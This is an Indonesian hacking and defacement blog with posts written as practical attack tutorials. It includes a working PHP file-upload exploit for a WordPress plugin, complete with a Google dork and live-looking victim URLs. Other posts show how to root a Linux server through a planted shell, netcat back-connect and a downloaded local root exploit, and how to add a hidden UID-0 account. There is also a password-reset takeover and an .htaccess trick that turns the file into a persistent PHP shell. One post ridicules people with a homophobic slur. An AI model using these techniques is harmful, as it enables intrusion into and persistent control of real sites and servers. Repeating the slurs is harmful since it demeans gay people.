Blogroll

Kamis, 31 Oktober 2013

kabar baik

Alhamdulilah Site Personal saya udah ada
Ada banyak Tutor Disana :)


Site : Penjaga Warteg
Read More
Thread By di Tidak ada komentar:

Deface Dengan wordpress magnitudo theme arbitrary

 baru Nemu Exploit baru di Facebook ane
Authornya Index php :)
Langsung ke TKP

#######################################################
# Exploit Title:Wordpress plugins wp-mailinglist Arbitrary File Upload
# Google Dork: "inurl:/wp-content/plugins/wp-mailinglist/"
# Exploit Author: Index Php
# Tested on: Windows, PHP 5.2
# File Type : Txt
# Author 2 : MrTieDie
# Tested on : Windows 7, Php Xampp
#######################################################
#exploit

<?php

$uf="your_file.txt";
$c = curl_init("http://target.com/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uf",
'folder'=>'/'));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($c);
curl_close($c);

print "$postResult";
?>


File path http://target.com/wp-content/uploads/wp-mailinglist/uploadify/random_name.txt

Demo sites
http://www.freresdeshommes.org/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php
http://www.whitelodge.com.sg//wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php
http://www.prairieswine.com/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php
Read More
Thread By di Tidak ada komentar:

Sisi Berbahaya Dari Seorang HACKER

Maaf Sudah Lama Ngga Ngepost
Internet Di Rumah Error :/
Maksudnya Curhat pak :v
Mulai Topiknya :)

Nggak ada bahan uat posting, akhirnya blogwalking ke blog temen nemu artikel buat dijadikan refrensi. Kali ini saya akan menguak sisi "berbahaya" dari seorang hacker. Pernahkah anda cermati, saat seorang defacer meninggalkan pesan di halaman defacenya, ada kalimat yang berbunyi "My Evil Side Maybe Very Dangerous !" .
Yang kita bahas disini adalah kata "Very Dangerous". Saya yang seorang nwebie tolol ini awalnya berpendapat, ya jelas lah hacker itu berbahaya. Bayangkan saya, selain bisa merusak web, hacker juga bisa membuat virus. Apalagi virusnya bisa dikirim ke komputer korban buat nyuri password. WOW banget kan [lagi-lagi saya harus mengakui kehebatan Master Andre Aprilio].
Tapi setelah agak lama ikut menyimak dunia "suram" [underground] akhirnya saya sadar bahwa sisi berbahaya seorang hacker bukanlah kehebatannya menyusup ke jaringan tanpa diketahui, melainkan karena dia MAHO !!!!
Ini buktinya :

L.O.L !

Di skrinsut diatas terlihat jelas bahwa orang yang bernama بريان ماهاديكا sedang melakukan percakapan dengan Yuyud. Sekedar info, Yuyud  disini cuma korban. Dia tidak maho karena sudah punya pacar bernama Nabilah Ratna Ayu Azalia [Nabilah JKT48]. Dan si  بريان ماهاديكا juga laki-laki. [Sudah saya cek diprofilnya].
Dan lihatlah emo yang dia berikan kepada si Yuyud. OMG, dia memberikan smiley "maaf" mencium !!! Padahal dia laki-laki dan Yuyud juga laki-laki. Dari situlah bisa disimpulkan bahwa si بريان ماهاديكا adalah MAHO PERMANEN. Mungkin efek dia belum pernah melihat wanita [selain ibunya] seumur hidup.

Namun itu belum seberapa. Ada yang lebih ekstrim menyebut dirinya maho.
Ngaku maho cok !!

Sekarang kalian percaya kan kalo hacker itu berbahaya. Itulah mengapa saya tidak mau menjadi hacker.

Intinya, arti dari "My Evil side Maybe Very Dangerous" adalah :
"My Evil Side" : Evil Side yang dimaksud disini mungkin karena sifatnya yang suka menggoda laki-laki lain, apalagi yang sudah punya pacar. [terlihat dari smiley ciuman di screenshoot]
"Maybe Very Dangerous" : Ya jelas Dangerous lah. Pasti orang normal akan merasa risih jika digoda sesama jenis -_- . Ini jelas berbahaya untuk kelangsungan hidup [Jika berkelanjutan bisa menyebabkan Trauma Berat atau cacat mental].

Sekian postingan sebelum subuh kali ini. Buat yang jadi objek penelitian, jangan tersinggung ya om,karena ini fakta. :p

Thanks to maho Tintonz-x207 buat artikel inspirasinya.

Hacker itu berbahaya
Sisi Berbahaya seorang hacker
Mengapa hacker berbahaya ?
Hacker itu maho
Hacker Gay

Sumber : madura Cyber
Read More
Thread By di Tidak ada komentar:

Minggu, 22 September 2013

See You AnonGhost

Hello Brothers,

Topik Kali Sangat Hangat Di Dunia Hacking Defacing
karena Salah Satu Group Hackers Terkenal yaitu ANONGHOST Gulung Tikar
Ntah Mengapa Group ANONYMOUS Itu Gulung Tikar
Ini Masih Menjadi Misteri.
Bukti :


 




 
 
One of the worlds most Popular Anonymous hacking group 'AnonGhost', is closed now. The Announcement was made by The founders of AnonGhost on their official Facebook and twitter page.



 AnonGhost one of the most popular Anonymous hacking network have run many operations through out their time and hacked thousands of website worldwide, including database leak, emails leak from multinational firms. Most of their attacks was concentrated on Israel and Country's supporting Israel.

We talked to Mauritania Attacker leader of Team AnonGhost and got confirmed the news. This might be our last Conversation with him, and was very short:

Techworm: What do you want to say to the world?

AnonGhost: all we wanna say is that we left cyber world with honor and if Israel do Something we will come back to punish them again.
Techworm: ok people will like to know, leaving have something to do with fbi behind you?

Anonghost: no... no.... haha
Techworm: do u think your work is done for now?
Anonghost: :)

AnonGhost is one of the strongest Anonymous team with 24 Members:

Mauritania Attacker - Virusa Worm - SpitFir3 - Deto Beiber - Dr.SàM!M_008 - Kais Patron - Ian Surgent - M3GAFAB - PhObia_PhOney - Mr Domoz - Tak Dikenal - AnonxoxTN - Spec Tre - Raka 3r00t - Gh0st_3xp10!t - PirateX - Bl4ck Jorozz - Younes Lmaghribi - Indonesian r00t - Y0ji - BlackBase Hacker - CoderSec - h4shcr4ck - Mrlele

It might happen that AnonGhost can return in future as they mentioned, if Israel does something they will be back.
 


 


Group ANONYMOUS Ini Sangat Lah Terkenal karena
Member-membernya Yang Cukup hebat Di Dunia Underground / IT

Sekian Dari Saya

Galauers Dot Id A.K.A GwGanteng007 To AnonGhost

Website yang di beri info :
AnonGhost

See You AnonGhost

Sumber : Click Here !

Read More
Thread By di Tidak ada komentar:

Jumat, 20 September 2013

[Tutorial]Rooting Server

Hello Brothers
Saya Akan Share TUTORIAL Tentang ROOTING SERVER
Mulai Tutorialnya


TUTORIAL :

















Today im gonna tell u how to root a linux server.
This is going to be a short,HQ tutorial with pictures included (For better learining)

Things Required:

  • Shelled site
  • A Local root exploit
  • NetCat

Step 1 - Gathering informations

 Open up your .php shell.
I have mine for an example

Now you need to check what kernel your victim is using...
It should be something like 

Linux somehostingsite.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686

 Next thing you wanna do is to look for a local root exploit.
Example mine is 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.


For finding exploits u could search in sites like exploit-db, 1337day, th3-0utl4ws etc.. or simply google

Step 2 - Backconnecting to the server
For this you will need:

1) NetCat
2) Open port (Example. 443 I won't b teaching how to port forward, use Google if you don't know how!!)

 So open your netcat and type:
-l -n -v -p 443
Hit "Enter"

 Now it should write "listening on [any] 443 ..."
Good.
Go back to your shell and go to "BackConnect function"
Many shells have it.
Enter your port and press "Connect".
 

Now it should connect to your netcat 
I got something like this
 


Step 3 - Downloading exploit and executing it
Now we will need our exploit from Chapter 1
There's 2 way of uploading:

1) Using shell uploader
2) Using 'wget' function (Requires backconnection)

I'm going to use 'wget' function because it's easier and faster.
So copy your exploit link (Mine one http://localroot.th3-0utl4ws.com/xploits...8-164.zip) and go back to your netcat and type:

Now it downloaded out exploit named "2.6.18-164.zip" on our server.

If your exploit is downloaded as anyrandomname.c you must compile it
Do do that first download that exploit and then type:

gcc anyrandomname.c -o anyrandomname
And our exploit is compiled. (If you get errors when compiling then find another exploit
  
If you downloaded your exploit in zip file anyrandomname.zip type:

unzip anyrandomname.zip

Now you should have your exploit (Like mine "2.6.18-164")

If you completed all steps it's time to get root.

Type:

chmod 777 yourexploit'sname
With common sense where i typed "yourexploit'sname" you will type your exploit's name.

And one last final step is to run our exploit
./yourexploit'sname

To check if you got root type
id
or
whoami

Mine steps to root
 

Step 4 - Adding root user
Adding new root user is fairly easy
We use this command:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

Command explanations:
Quote:adduser - Using Linux adduser command to create a new user account or to update default new user information.

-u 0 -o - Set the value of user id to 0.

-g 0 - Set the initial group number or name to 0

-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M - 'home directory' not created for the user.

root2 - User name of the new user account.NOTE: Change root2 to your desired username.

Now you need to set a password for your username.
Type in next:
passwd Root2

(Root2 is your username)

See an example

[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

To check if you did alright

id root2
(Root2 is your username)




NetCat      : Sogok Aku Mas :'(
GNY Shell : TUSBOL AKU MAS :'(
Read More
Thread By di Tidak ada komentar:

Kamis, 19 September 2013

[Tutorial] Deface Dengan Reset Passwords Wordpress

hello brothers
Kali ini saya akan Share Tentang " Reset password Wordpress "
Mulai Tutorialnya

Dork: inurl:"/wp-content/plugins/ripe-hd-player

 Pertama tentunya mencari target dengan dork, setelah keliling muter2 dapet deh ane target web nya :D

Kemudian saya jalankan script perlnya, :) lihat aja gambar berikut merupakan bagaimana cara menjalankan exploitnya :)

Lalu tinggal masukkan targetnya aja dengan cara : perl wp.pl site.com / 

Note : Jangan gunakan (http://) dan tambahkan spasi antara link dan garis miring seperti contoh usage1 dan usage2

Nah, kalo passwordnya sudah berhasil di reset :) tinggal loggin dah :)

Taraa,, jika berhasil pasti bisa masuk ke panel admin :) tinggal Tanem shell aja :)

Begitulah prosesnya :) mudah2an pada ngerti dah, kalo ada yg mau ditanyakan silahkan kunjungi Fanspagenya langsung Disini :p jangan tanya ke saya, karena saya cuma blogger yg cuma bisa nulis aja :(

Thanks :)

 

Sumber : INDONESIA CYBER ARMY

Read More
Thread By di Tidak ada komentar:

Rabu, 18 September 2013

Pasang Shell .htacces

Hallo Brothers,
Ketemu Lagi Dengan saya
Galauers Dot Id A.k.A GwGanteng007

Pasti Anda Jengkel kan
Setiap Pasang Shell Pasti Ke Hapus Sama Adminnya
Santay Brothers Saya Ada Trick nya
Gini


[+] BAHAN [+]
-Shell Yang Udah Ketanam
-Script .httaccess

[+]Tutorial[+]

Firts Step :
Buka Website Yang Sudah Kamu Tanam Shell

Two Step:
 Buat File Baru ( buat shell yang ada )/ kalau Di shell saya harus buat dari notepad

Three Step :
Copy dan Paste Script Ini
--------------------

Order allow,deny
Allow from all

AddType application/x-httpd-php .htaccess


 Four Step:
Upload / Simpan Dengan Nama .htacces

Five Step:
Selesai

Untuk membuka ..htacces
Seperti ini
localhost.com/.htacces?cmd=

Sekian Dan Terima Kasih,

galauers Dot Id

Sumber : Click here
Read More
Thread By di Tidak ada komentar:

Cari Blog Ini

Copyright © 2012 All About Share | Sword Art Online Theme| Powered by Blogger | Designed by Yoshua Marchiano